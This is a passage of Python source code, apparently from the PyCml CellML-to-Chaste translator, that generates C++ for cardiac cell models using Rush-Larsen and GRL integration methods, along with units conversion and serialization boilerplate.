"""Output the special methods needed for Rush-Larsen style cell models.
We generate:
* EvaluateEquations evaluate the model derivatives and alpha/beta terms
* ComputeOneStepExceptVoltage does a Rush-Larsen update for eligible variables,
and a forward Euler step for other non-V state variables
"""
rl_vars = self.doc._cml_rush_larsen
# EvaluateEquations
###################
self.output_method_start('EvaluateEquations',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double> &rDY',
'std::vector<double> &rAlphaOrTau',
'std::vector<double> &rBetaOrInf'],
'void', access='public')
self.open_block()
normal_vars = [v for v in self.state_vars if not v in rl_vars]
nodes, table_nodes = set(), set()
for _, alpha_or_tau, beta_or_inf, _ in rl_vars.itervalues():
table_nodes.add(alpha_or_tau)
nodes.update(self._vars_in(alpha_or_tau))
table_nodes.add(beta_or_inf)
nodes.update(self._vars_in(beta_or_inf))
self.output_derivative_calculations(normal_vars, True, nodes, table_nodes)
# Now assign input vectors
for i, var in enumerate(self.state_vars):
if var in rl_vars:
# Fill in rAlphaOrTau & rBetaOrInf
self.writeln(self.vector_index('rAlphaOrTau', i), self.EQ_ASSIGN, nl=False)
self.output_expr(rl_vars[var][1], False)
self.writeln(self.STMT_END, indent=False)
self.writeln(self.vector_index('rBetaOrInf', i), self.EQ_ASSIGN, nl=False)
self.output_expr(rl_vars[var][2], False)
self.writeln(self.STMT_END, indent=False)
else:
# Fill in rDY
self.writeln(self.vector_index('rDY', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.close_block()
# ComputeOneStepExceptVoltage
#############################
self.output_method_start('ComputeOneStepExceptVoltage',
['const std::vector<double> &rDY',
'const std::vector<double> &rAlphaOrTau',
'const std::vector<double> &rBetaOrInf'],
'void', access='public')
self.open_block()
self.writeln('std::vector<double>& rY = rGetStateVariables();')
for i, var in enumerate(self.state_vars):
if var in rl_vars:
# Rush-Larsen update
conv = rl_vars[var][3] or ''
if conv: conv = '*' + str(conv)
if rl_vars[var][0] == 'ab':
# Alpha & beta formulation
self.open_block()
self.writeln(self.TYPE_CONST_DOUBLE, 'tau_inv = rAlphaOrTau[', i, '] + rBetaOrInf[', i, '];')
self.writeln(self.TYPE_CONST_DOUBLE, 'y_inf = rAlphaOrTau[', i, '] / tau_inv;')
self.writeln('rY[', i, '] = y_inf + (rY[', i, '] - y_inf)*exp(-mDt', conv, '*tau_inv);')
self.close_block(blank_line=False)
else:
# Tau & inf formulation
self.writeln('rY[', i, '] = rBetaOrInf[', i, '] + (rY[', i, '] - rBetaOrInf[', i, '])',
'*exp(-mDt', conv, '/rAlphaOrTau[', i, ']);')
elif var is not self.v_variable:
# Forward Euler update
self.writeln('rY[', i, '] += mDt * rDY[', i, '];')
self.close_block()
#Megan E. Marsh, Raymond J. Spiteri
#Numerical Simulation Laboratory
#University of Saskatchewan
#December 2011
#Partial support provided by research grants from
#the National Science and Engineering Research
#Council (NSERC) of Canada and the MITACS/Mprime
#Canadian Network of Centres of Excellence.
def output_derivative_calculations_grl(self, var, assign_rY=False, extra_nodes=set(), extra_table_nodes=set()):
"""This is used by self.output_grl?_mathematics to get equations for each variable separately.
Returns a node set with the equations output.
"""
# Work out what equations are needed to compute the derivative of var
if var in self.state_vars:
dvardt = (var, self.free_vars[0])
var_nodeset = self.calculate_extended_dependencies([dvardt])
else:
var_nodeset = set()
# State variable inputs
self.output_state_assignments(nodeset=var_nodeset, assign_rY=assign_rY)
self.writeln()
table_index_nodes_used = self.calculate_lookup_table_indices(var_nodeset, self.code_name(self.free_vars[0]))
self.output_comment('Mathematics')
self.output_equations(var_nodeset - table_index_nodes_used)
return var_nodeset | table_index_nodes_used
def find_grl_partial_derivatives(self):
"""If we have analytic Jacobian information available from Maple, find the terms needed for GRL methods.
This caches where the diagonal entries are in the matrix, indexed by the state variable objects currently in use,
since the entries in the matrix may reference non-partially-evaluated variables.
"""
if not hasattr(self, 'jacobian_diagonal'):
self.jacobian_diagonal = {}
if self.use_analytic_jacobian and not self.jacobian_diagonal:
for entry in self.model.solver_info.jacobian.entry:
if entry.var_i == entry.var_j:
# It's a diagonal entry
var = self.varobj(entry.var_i).get_source_variable(recurse=True)
assert var in self.state_vars, "Jacobian diagonal entry is not in the state vector: " + entry.xml()
entry_content = list(entry.math.xml_element_children())
assert len(entry_content) == 1, "Malformed Jacobian entry: " + entry.xml()
self.jacobian_diagonal[var] = entry_content[0]
def output_grl_compute_partial(self, i, var):
"""Compute the partial derivative of f(var) wrt var, the i'th variable in the state vector.
This uses an analytic Jacobian if available; otherwise it approximates using finite differences.
"""
self.output_method_start('EvaluatePartialDerivative'+str(i),
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double>& rY', 'double delta', 'bool forceNumerical'],
'double', access='public', defaults=['', '', '', 'false'])
self.open_block()
self.writeln('double partialF;')
if self.jacobian_diagonal:
# Work out what equations are needed to compute the analytic derivative
self.writeln('if (!forceNumerical && this->mUseAnalyticJacobian)')
self.open_block()
entry = self.jacobian_diagonal[var]
nodeset = self.calculate_extended_dependencies(self._vars_in(entry))
self.output_state_assignments(nodeset=nodeset, assign_rY=False)
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset|set([entry]), self.code_name(self.free_vars[0]))
self.output_equations(nodeset)
# Calculate the derivative
self.writeln('partialF = ', nl=False)
self.output_expr(entry, paren=False)
self.writeln(self.STMT_END, indent=False)
self.close_block(blank_line=False)
self.writeln('else')
self.open_block()
# Numerical approximation
self.writeln('const double y_save = rY[', i, '];')
self.writeln('rY[', i, '] += delta;')
self.writeln('const double temp = EvaluateYDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY);')
self.writeln('partialF = (temp-mEvalF[', i, '])/delta;')
self.writeln('rY[', i, '] = y_save;')
if self.jacobian_diagonal:
self.close_block(blank_line=False)
self.writeln('return partialF;')
self.close_block()
#Megan E. Marsh, Raymond J. Spiteri
#Numerical Simulation Laboratory
#University of Saskatchewan
#December 2011
#Partial support provided by research grants from
#the National Science and Engineering Research
#Council (NSERC) of Canada and the MITACS/Mprime
#Canadian Network of Centres of Excellence.
def output_grl1_mathematics(self):
"""Output the special methods needed for GRL1 style cell models.
We generate:
* UpdateTransmembranePotential update V_m
* ComputeOneStepExceptVoltage does a GRL1 update for variables except voltage
* EvaluateYDerivativeI for each variable I
"""
self.find_grl_partial_derivatives()
########################################################UpdateTransmembranePotential
self.output_method_start('UpdateTransmembranePotential',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('unsigned v_index = GetVoltageIndex();')
self.writeln('const double delta = 1e-8;')
self.writeln()
# Compute partial derivative of dV wrt V
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(self.v_variable)
self.writeln()
self.writeln('double evalF = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('mEvalF[', self.v_index, '] = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('double partialF = EvaluatePartialDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY, delta, true);')
self.writeln('if (fabs(partialF) < delta)')
self.open_block()
self.writeln('rY[v_index] += evalF*mDt;')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[v_index] += (evalF/partialF)*(exp(partialF*mDt)-1.0);')
self.close_block()
self.close_block()
#########################################################ComputeOneStepExceptVoltage
self.output_method_start('ComputeOneStepExceptVoltage',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
# Set up variables
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('const double delta = 1e-8;')
self.writeln()
# Evaluate RHS of equations (except dV/dt)
non_v_vars = self.state_vars[:]
if self.v_variable in non_v_vars:
non_v_vars.remove(self.v_variable)
self.output_derivative_calculations(non_v_vars)
# Compute partial derivatives (for non-V)
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.writeln('mEvalF[', i, '] = ', self.code_name(var, ode=True), self.STMT_END)
self.writeln('mPartialF[', i, '] = EvaluatePartialDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY, delta);')
# Do the GRL updates
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.open_block()
self.writeln('if (fabs(mPartialF[', i, ']) < delta)')
self.open_block()
self.writeln('rY[', i, '] += mDt*', self.code_name(var, True), ';')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[', i, '] += (', self.code_name(var, True), '/mPartialF[', i, '])*(exp(mPartialF[', i, ']*mDt)-1.0);')
self.close_block()
self.close_block()
self.close_block()
#########################################################Evaluate each equation
for i, var in enumerate(self.state_vars):
self.output_method_start('EvaluateYDerivative'+str(i),
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double>& rY'],
'double', access='public')
self.open_block()
if var is self.v_variable:
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(var)
self.writeln()
self.writeln('return ', self.code_name(var, True), ';')
self.close_block()
self.output_grl_compute_partial(i, var)
#Megan E. Marsh, Raymond J. Spiteri
#Numerical Simulation Laboratory
#University of Saskatchewan
#December 2011
#Partial support provided by research grants from
#the National Science and Engineering Research
#Council (NSERC) of Canada and the MITACS/Mprime
#Canadian Network of Centres of Excellence.
def output_grl2_mathematics(self):
"""Output the special methods needed for GRL2 style cell models.
We generate:
* Update TransmembranePotential update V_m
* ComputeOneStepExceptVoltage does a GRL2 update for variables except voltage
* EvaluateYDerivativeI for each variable I
"""
self.find_grl_partial_derivatives()
########################################################UpdateTransmembranePotential
self.output_method_start('UpdateTransmembranePotential',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('const unsigned v_index = GetVoltageIndex();')
self.writeln('const double delta = 1e-8;')
self.writeln('const double yinit = rY[v_index];')
self.writeln()
# Do the first half step
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(self.v_variable)
self.writeln()
self.writeln('double evalF = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('mEvalF[', self.v_index, '] = ', self.code_name(self.v_variable, ode=True), self.STMT_END)
self.writeln('double partialF = EvaluatePartialDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY, delta, true);')
self.writeln('if (fabs(partialF) < delta)')
self.open_block()
self.writeln('rY[v_index] += 0.5*evalF*mDt;')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[v_index] += (evalF/partialF)*(exp(partialF*0.5*mDt)-1.0);')
self.close_block()
# Do the second half step
self.writeln('rY[v_index] = yinit;')
self.writeln('evalF = EvaluateYDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY);')
self.writeln('mEvalF[', self.v_index, '] = evalF;')
self.writeln('partialF = EvaluatePartialDerivative', self.v_index, '(', self.code_name(self.free_vars[0]), ', rY, delta, true);')
self.writeln('if (fabs(partialF) < delta)')
self.open_block()
self.writeln('rY[v_index] = yinit + evalF*mDt;')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[v_index] = yinit + (evalF/partialF)*(exp(partialF*mDt)-1.0);')
self.close_block()
self.close_block() # End method
#########################################################ComputeOneStepExceptVoltage
self.output_method_start('ComputeOneStepExceptVoltage',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0])],
'void', access='public')
self.open_block()
# Set up variables
self.writeln('std::vector<double>& rY = rGetStateVariables();')
self.writeln('const double delta=1e-8;')
self.writeln('const unsigned size = GetNumberOfStateVariables();')
self.writeln('mYInit = rY;')
self.writeln('double y_save;')
self.writeln()
# Calculate partial derivatives
self.output_derivative_calculations(self.state_vars)
for i, var in enumerate(self.state_vars):
self.writeln(self.vector_index('mEvalF', i), self.EQ_ASSIGN, self.code_name(var, True), self.STMT_END)
self.writeln()
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.writeln('mPartialF[', i, '] = EvaluatePartialDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY, delta);')
# Update all variables
self.writeln('for (unsigned var=0; var<size; var++)')
self.open_block()
self.writeln('if (var == ', self.v_index, ') continue;')
self.writeln('if (fabs(mPartialF[var]) < delta)')
self.open_block()
self.writeln('rY[var] = mYInit[var] + 0.5*mDt*mEvalF[var];')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[var] = mYInit[var] + (mEvalF[var]/mPartialF[var])*(exp(mPartialF[var]*0.5*mDt)-1.0);')
self.close_block()
self.close_block()
self.writeln()
# Determine new partial derivatives
for i, var in enumerate(self.state_vars):
if var is not self.v_variable:
self.writeln()
self.writeln('y_save = rY[', i, '];')
self.writeln('rY[', i, '] = mYInit[', i, '];')
self.writeln('mEvalF[', i, '] = EvaluateYDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY);')
self.writeln('mPartialF[', i, '] = EvaluatePartialDerivative', i, '(', self.code_name(self.free_vars[0]), ', rY, delta);')
self.writeln('rY[', i, '] = y_save;')
# Update all variables
self.writeln('for (unsigned var=0; var<size; var++)')
self.open_block()
self.writeln('if (var == ', self.v_index, ') continue;')
self.writeln('if (fabs(mPartialF[var]) < delta)')
self.open_block()
self.writeln('rY[var] = mYInit[var] + mDt*mEvalF[var];')
self.close_block(False)
self.writeln('else')
self.open_block()
self.writeln('rY[var] = mYInit[var] + (mEvalF[var]/mPartialF[var])*(exp(mPartialF[var]*mDt)-1.0);')
self.close_block()
self.close_block()
self.writeln()
self.close_block() # End method
#########################################################Evaluate each equation
for i, var in enumerate(self.state_vars):
self.output_method_start('EvaluateYDerivative'+str(i),
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'std::vector<double>& rY'],
'double', access='public')
self.open_block()
if var is self.v_variable:
self.writeln(self.TYPE_DOUBLE, self.code_name(self.v_variable, ode=True), self.STMT_END)
self.output_derivative_calculations_grl(var)
self.writeln()
self.writeln('return '+self.code_name(var, True)+';')
self.close_block()
self.output_grl_compute_partial(i, var)
def output_model_attributes(self):
"""Output any named model attributes defined in metadata.
Such attributes are given by compound RDF annotations:
model --pycml:named-attribute--> bnode
bnode --pycml:name--> Literal(Attribute name, string)
bnode --pycml:value--> Literal(Attribute value, double)
"""
model = self.model
meta_id = model.cmeta_id
attrs = []
if meta_id:
property = cellml_metadata.create_rdf_node(('pycml:named-attribute', NSS['pycml']))
name_prop = cellml_metadata.create_rdf_node(('pycml:name', NSS['pycml']))
value_prop = cellml_metadata.create_rdf_node(('pycml:value', NSS['pycml']))
source = cellml_metadata.create_rdf_node(fragment_id=meta_id)
attr_nodes = cellml_metadata.get_targets(model, source, property)
for node in attr_nodes:
name = cellml_metadata.get_target(model, node, name_prop)
value = cellml_metadata.get_target(model, node, value_prop)
attrs.append((name, value))
for name, value in attrs:
self.writeln('this->mAttributes["', name, '"] = ', value, ';')
if attrs:
self.writeln()
def output_bottom_boilerplate(self):
"""Output bottom boilerplate.
End class definition, output ODE system information (to .cpp) and
serialization code (to .hpp), and end the file.
"""
# End main class
self.set_indent(offset=-1)
self.writeln_hpp('};\n\n')
# ODE system information
self.writeln('template<>')
self.writeln('void OdeSystemInformation<', self.class_name,
'>::Initialise(void)')
self.open_block()
self.writeln('this->mSystemName', self.EQ_ASSIGN, '"', self.model.name, '"', self.STMT_END)
self.writeln('this->mFreeVariableName', self.EQ_ASSIGN,
'"', self.var_display_name(self.free_vars[0]), '"', self.STMT_END)
self.writeln('this->mFreeVariableUnits', self.EQ_ASSIGN,
'"', self.free_vars[0].units, '"', self.STMT_END)
self.writeln()
def output_var(vector, var):
self.writeln('this->m', vector, 'Names.push_back("', self.var_display_name(var), '");')
self.writeln('this->m', vector, 'Units.push_back("', var.units, '");')
for var in self.state_vars:
output_var('Variable', var)
init_val = getattr(var, u'initial_value', None)
if init_val is None:
init_comm = ' // Value not given in model'
# Don't want compiler error, but shouldn't be a real number
init_val = self.NOT_A_NUMBER
else:
init_comm = ''
self.writeln('this->mInitialConditions.push_back(', init_val, ');',
init_comm, '\n')
# Model parameters
for var in self.cell_parameters:
if var.get_type() == VarTypes.Constant:
output_var('Parameter', var)
self.writeln()
# Derived quantities
for var in self.derived_quantities:
output_var('DerivedQuantity', var)
self.writeln()
self.output_model_attributes()
self.writeln('this->mInitialised = true;')
self.close_block()
self.writeln()
# Serialization
if self.include_serialization:
self.output_comment('Needs to be included last', subsidiary=True)
self.writeln_hpp('#include "SerializationExportWrapper.hpp"')
self.writeln_hpp('CHASTE_CLASS_EXPORT(', self.class_name, ')')
self.output_comment('Serialization for Boost >= 1.36')
self.writeln('#include "SerializationExportWrapperForCpp.hpp"')
self.writeln('CHASTE_CLASS_EXPORT(', self.class_name, ')')
self.writeln_hpp()
self.writeln_hpp('namespace boost')
self.open_block(subsidiary=True)
self.writeln_hpp('namespace serialization')
self.open_block(subsidiary=True)
# Save
self.writeln_hpp('template<class Archive>')
self.writeln_hpp('inline void save_construct_data(')
self.writeln_hpp('Archive & ar, const ', self.class_name,
' * t, const unsigned int fileVersion)',
indent_offset=1)
self.open_block(subsidiary=True)
self.writeln_hpp('const boost::shared_ptr<AbstractIvpOdeSolver> p_solver = t->GetSolver();')
self.writeln_hpp('const boost::shared_ptr<AbstractStimulusFunction> p_stimulus = t->GetStimulusFunction();')
self.writeln_hpp('ar << p_solver;')
self.writeln_hpp('ar << p_stimulus;')
self.close_block(subsidiary=True)
# Load
self.writeln_hpp('template<class Archive>')
self.writeln_hpp('inline void load_construct_data(')
self.writeln_hpp('Archive & ar, ', self.class_name,
' * t, const unsigned int fileVersion)',
indent_offset=1)
self.open_block(subsidiary=True)
self.writeln_hpp('boost::shared_ptr<AbstractIvpOdeSolver> p_solver;')
self.writeln_hpp('boost::shared_ptr<AbstractStimulusFunction> p_stimulus;')
self.writeln_hpp('ar >> p_solver;')
self.writeln_hpp('ar >> p_stimulus;')
self.writeln_hpp('::new(t)', self.class_name, '(p_solver, p_stimulus);')
self.close_block(subsidiary=True)
self.close_block(subsidiary=True)
self.close_block(subsidiary=True)
if self.dynamically_loadable:
# Write the C function to create instances of this cell model
self.writeln('extern "C"')
self.open_block()
self.writeln('AbstractCardiacCellInterface* MakeCardiacCell(')
self.writeln('boost::shared_ptr<AbstractIvpOdeSolver> pSolver,', indent_offset=2)
self.writeln('boost::shared_ptr<AbstractStimulusFunction> pStimulus)', indent_offset=2)
self.open_block()
self.writeln('return new ', self.class_name, '(pSolver, pStimulus);')
self.close_block()
self.close_block()
# End file
self.writeln_hpp('#endif // ', self.include_guard)
return
def output_lhs(self, expr):
"""Output the left hand side of an assignment expression."""
if expr.localName == 'ci':
self.output_variable(expr)
elif expr.operator().localName == 'diff':
ci_elt = expr.operands().next()
self.output_variable(ci_elt, ode=True)
return
def output_variable(self, ci_elt, ode=False):
"""Output a ci element, i.e. a variable lookup."""
if hasattr(ci_elt, '_cml_variable') and ci_elt._cml_variable:
self.write(self.code_name(ci_elt.variable, ode=ode))
else:
# This ci element doesn't have all the extra annotations. It is a fully
# qualified name though. This is typically because PE has been done.
prefix = ['var_', 'd_dt_'][ode]
varname = unicode(ci_elt)
try:
var = self.varobj(varname)
except KeyError:
var = None
if var:
self.write(self.code_name(var, ode=ode))
else:
# Assume it's a suitable name
self.write(prefix + varname)
return
def output_function(self, func_name, args, *posargs, **kwargs):
"""Override base class method for special case of abs with 2 arguments.
This comes from Maple's Jacobians, and should generate signum of the second argument.
"""
args = list(args)
if func_name == 'fabs' and len(args) == 2:
super(CellMLToChasteTranslator, self).output_function('Signum', [args[1]], *posargs, **kwargs)
else:
super(CellMLToChasteTranslator, self).output_function(func_name, args, *posargs, **kwargs)
@staticmethod
def get_current_units_options(model):
"""
Return a list of units objects that give the possibilities for the dimensions
of transmembrane ionic currents.
"""
chaste_units = cellml_units.create_new(
model, 'uA_per_cm2',
[{'units': 'ampere', 'prefix': 'micro'},
{'units': 'metre', 'prefix': 'centi', 'exponent': '-2'}])
microamps = cellml_units.create_new(model, u'microamps',
[{'units':'ampere', 'prefix':'micro'}])
A_per_F = cellml_units.create_new(model, 'A_per_F',
[{'units': 'ampere'},
{'units': 'farad', 'exponent': '-1'}])
return [chaste_units, microamps, A_per_F]
# Name in CellML for the variable representing Chaste's membrane capacitance
MEMBRANE_CAPACITANCE_NAME = u'chaste_membrane_capacitance'
# Name of the component added to interface the model to Chaste
INTERFACE_COMPONENT_NAME = u'chaste_interface'
@staticmethod
def add_special_conversions(converter, comp):
"""Add special units conversions for ionic currents.
Adds conversions for the two other common conventions to/from the units expected by Chaste,
uA/cm^2. The cases are:
1. Current in amps/farads.
In this case we convert to uA/uF then multiply by Chaste's value
for the membrane capacitance (in uF/cm^2).
2. Current in amps, capacitance in farads.
We assume the cell model conceptually represents a cell, and hence
that its membrane capacitance is supposed to represent the same
thing as Chaste's. Thus convert current to uA, capacitance to uF,
and return current/capacitance * Chaste's capacitance.
comp is a component to which we should add any necessary variables, i.e. Chaste's capacitance.
"""
klass = CellMLToChasteTranslator
model = converter.model
# Variables needed by some conversions
model_Cm = model.get_config('Cm_variable')
uF_per_cm2 = cellml_units.create_new(model, 'uF_per_cm2',
[{'units': 'farad', 'prefix': 'micro'},
{'units': 'metre', 'prefix': 'centi', 'exponent': '-2'}])
Chaste_Cm = converter.add_variable(comp, klass.MEMBRANE_CAPACITANCE_NAME, uF_per_cm2)
model._cml_Chaste_Cm = Chaste_Cm # Record for use in code_name
# Add the conversions
chaste_units, microamps, A_per_F = klass.get_current_units_options(model)
converter.add_special_conversion(A_per_F, chaste_units,
lambda expr: converter.times_rhs_by(expr, Chaste_Cm))
converter.add_special_conversion(chaste_units, A_per_F,
lambda expr: converter.divide_rhs_by(expr, Chaste_Cm))
if model_Cm:
converter.add_special_conversion(microamps, chaste_units,
lambda expr: converter.times_rhs_by(converter.divide_rhs_by(expr, model_Cm),
Chaste_Cm))
converter.add_special_conversion(chaste_units, microamps,
lambda expr: converter.divide_rhs_by(converter.times_rhs_by(expr, model_Cm),
Chaste_Cm))
@staticmethod
def generate_interface(doc, solver_info):
"""Generate an interface component connecting the model to Chaste.
On return from this method, Chaste code will only need to interact with variables in
the new interface component. It will contain the transmembrane potential, the ionic
and stimulus currents, the simulation time, and the derivatives.
It may also contain other variables depending on the model, for example the intracellular
calcium concentration (if annotated), modifiable parameters, and derived quantities.
If the --convert-interfaces option has been supplied, units conversion will then be
performed on this component, ensuring that all these variables are in the units expected
by Chaste and linked by suitable conversions to the rest of the model.
Note that if partial evaluation is then performed, the model will be collapsed into a
single component. However, the interface will still be preserved in the correct units.
"""
model = doc.model
config = doc._cml_config
klass = CellMLToChasteTranslator
# Create Chaste units definitions
ms = cellml_units.create_new(model, 'millisecond',
[{'units': 'second', 'prefix': 'milli'}])
mV = cellml_units.create_new(model, 'millivolt',
[{'units': 'volt', 'prefix': 'milli'}])
current_units, microamps = klass.get_current_units_options(model)[0:2]
# The interface generator
generator = processors.InterfaceGenerator(model, name=klass.INTERFACE_COMPONENT_NAME)
iface_comp = generator.get_interface_component()
# In case we need to convert initial values, we create the units converter here
if config.options.convert_interfaces:
warn_only = not config.options.fully_automatic and config.options.warn_on_units_errors
notifier = NotifyHandler(level=logging.WARNING)
logging.getLogger('units-converter').addHandler(notifier)
converter = processors.UnitsConverter(model, warn_only, show_xml_context_only=True)
klass.add_special_conversions(converter, iface_comp)
generator.set_units_converter(converter)
# And now specify the interface
t = model.find_free_vars()[0]
if not ms.dimensionally_equivalent(t.get_units()):
# Oops!
raise TranslationError('Time does not have dimensions of time')
generator.add_input(t, ms)
if doc.model.get_option('backward_euler'):
# Backward Euler code generation requires access to the time step
model_dt = solver_info.create_dt(generator, t.component, t.get_units())
config.dt_variable = generator.add_input(model_dt, ms)
config.dt_variable.set_pe_keep(True)
elif doc.model.get_option('maple_output'):
# CVODE Jacobians need to be able to scale for time too
fake_dt = generator.add_variable(t.component, 'fake_dt', ms, initial_value='1.0')
fake_dt._set_type(VarTypes.Constant)
config.dt_variable = generator.add_input(fake_dt, t.get_units())
config.dt_variable.set_is_modifiable_parameter(False)
config.dt_variable.set_pe_keep(True)
if config.options.use_chaste_stimulus and config.i_stim_var:
# We need to make it a constant so add_input doesn't complain, then make it computed
# again so that exposing metadata-annotated variables doesn't make it a parameter!
generator.make_var_constant(config.i_stim_var, 0)
config.i_stim_var = generator.add_input(config.i_stim_var, current_units,
annotate=False, convert_initial_value=False)
generator.make_var_computed_constant(config.i_stim_var, 0)
# Also convert variables that make up the default stimulus
# Note: we vary in/out-put primarily to test units conversion of initial values
def add_oxmeta_ioput(oxmeta_name, units, inout):
var = doc.model.get_variable_by_oxmeta_name(oxmeta_name, throw=False)
if var:
meth = getattr(generator, 'add_%sput' % inout)
newvar = meth(var, units, annotate=False)
newvar.set_pe_keep(True)
for n in ['duration', 'period', 'offset', 'end']:
add_oxmeta_ioput('membrane_stimulus_current_'+n, ms, 'in')
add_oxmeta_ioput('membrane_stimulus_current_amplitude', current_units, 'out')
if config.V_variable:
config.V_variable = generator.add_input(config.V_variable, mV)
ionic_vars = config.i_ionic_vars
if ionic_vars:
i_ionic = generator.add_output_function('i_ionic', 'plus', ionic_vars, current_units)
config.i_ionic_vars = [i_ionic]
if doc.model.get_option('use_data_clamp'):
assert config.V_variable and ionic_vars
# Create g_clamp
conductance_units = current_units.quotient(mV).simplify()
i_data_clamp_conductance = generator.add_variable(iface_comp, 'membrane_data_clamp_current_conductance', conductance_units, initial_value='0.0')
i_data_clamp_conductance._set_type(VarTypes.Constant)
i_data_clamp_conductance.set_pe_keep(True) # This prevents it becoming 'chaste_interface__membrane_data_clamp_current_conductance'
config.i_data_clamp_conductance = generator.add_input(i_data_clamp_conductance, conductance_units)
# Create V_clamp
data_var = config.i_data_clamp_data = generator.add_variable(iface_comp, 'experimental_data_voltage', mV, initial_value='0.0')
data_var._set_type(VarTypes.Constant)
data_var.set_pe_keep(True)
data_var._cml_code_name = 'GetExperimentalVoltageAtTimeT(%(time)s)'
# Create the current: I = g_clamp * (V - V_clamp)
current_var = config.i_data_clamp_current = generator.add_variable(iface_comp, 'membrane_data_clamp_current', current_units)
current_var._set_type(VarTypes.Computed)
current_var.set_is_derived_quantity(True)
sub = mathml_apply.create_new(model, u'minus', [config.V_variable.name, data_var.name])
times = mathml_apply.create_new(model, u'times', [config.i_data_clamp_conductance.name, sub])
assign = mathml_apply.create_new(model, u'eq', [current_var.name, times])
generator.add_expr_to_comp(iface_comp, assign)
# Make dV/dt use the new current
def process_ci(elt):
# Add reference to new current after first existing ionic current
ref = mathml_ci.create_new(model, local_current_var.name)
elt.xml_parent.xml_insert_after(elt, ref)
if hasattr(ionic_vars[0], '_cml_ref_in_dvdt'):
local_current_var = generator.connect_variables(current_var, (ionic_vars[0]._cml_ref_in_dvdt.component.name, current_var.name))
process_ci(ionic_vars[0]._cml_ref_in_dvdt)
else:
dVdt = config.V_variable.get_all_expr_dependencies()[0]
local_current_var = generator.connect_variables(current_var, (config.V_variable.component.name, current_var.name))
def process_ci_elts(elt):
"""Recursively process any ci elements in the tree rooted at elt."""
if isinstance(elt, mathml_ci):
if elt.variable is ionic_vars[0]:
process_ci(elt)
else:
for child in getattr(elt, 'xml_children', []):
process_ci_elts(child)
process_ci_elts(dVdt)
# Finish up
def errh(errors):
raise TranslationError("Creation of Chaste interface component failed:\n " + str(errors))
generator.finalize(errh, check_units=False)
# Apply units conversions just to the interface, if desired
if config.options.convert_interfaces:
converter.add_conversions_for_component(iface_comp)
converter.finalize(errh, check_units=False)
notifier.flush()
logging.getLogger('units-converter').removeHandler(notifier)
if notifier.messages:
msg = 'Problems occurred converting model variables to Chaste units.\n'
if ionic_vars and ionic_vars[0].get_units().dimensionally_equivalent(microamps):
msg += 'To convert the ionic currents for this model, '\
'the model membrane capacitance needs to be identified.'
if config.options.fully_automatic:
raise TranslationError(msg)
else:
print >>sys.stderr, msg
class CellMLToCvodeTranslator(CellMLToChasteTranslator):
"""Translate a CellML model to C++ code for use with Chaste+CVODE."""
# Type of (a reference to) the state variable vector
TYPE_VECTOR = 'N_Vector '
TYPE_VECTOR_REF = 'N_Vector ' # CVODE's vector is actually a pointer type
def vector_index(self, vector, i):
"""Return code for accessing the i'th index of vector."""
return 'NV_Ith_S(' + vector + ', ' + str(i) + ')'
def vector_create(self, vector, size):
"""Return code for creating a new vector with the given size."""
return ''.join(map(str, [self.TYPE_VECTOR, vector, self.EQ_ASSIGN,
'N_VNew_Serial(', size, ')', self.STMT_END]))
def vector_initialise(self, vector, size):
"""Return code for creating an already-declared vector with the given size."""
return ''.join(map(str, [vector, self.EQ_ASSIGN, 'N_VNew_Serial(', size, ')', self.STMT_END]))
def output_top_boilerplate(self):
"""Output top boilerplate code.
This method outputs #includes, and the start of the cell class
with constructor, destructor, and LT methods.
"""
# CVODE is optional in Chaste
self.writeln("#ifdef CHASTE_CVODE")
self.writeln_hpp("#ifdef CHASTE_CVODE")
self.include_serialization = True
self.use_backward_euler = False
if self.use_data_clamp:
self.use_analytic_jacobian = False # Todo - data current not included in analytic jacobian yet.
self.output_includes(base_class='AbstractCvodeCellWithDataClamp')
else:
self.use_analytic_jacobian = (self.model.get_option('maple_output') and hasattr(self.model.solver_info, u'jacobian'))
self.output_includes(base_class='AbstractCvodeCell')
# Separate class for lookup tables?
if self.use_lookup_tables and self.separate_lut_class:
self.output_lut_class()
# Start cell model class
self.writeln_hpp('class ', self.class_name, self.class_inheritance)
self.open_block(subsidiary=True)
# Serialization
self.output_serialize_method()
# Parameter declarations, and set & get methods (#666)
self.output_cell_parameters()
# Constructor
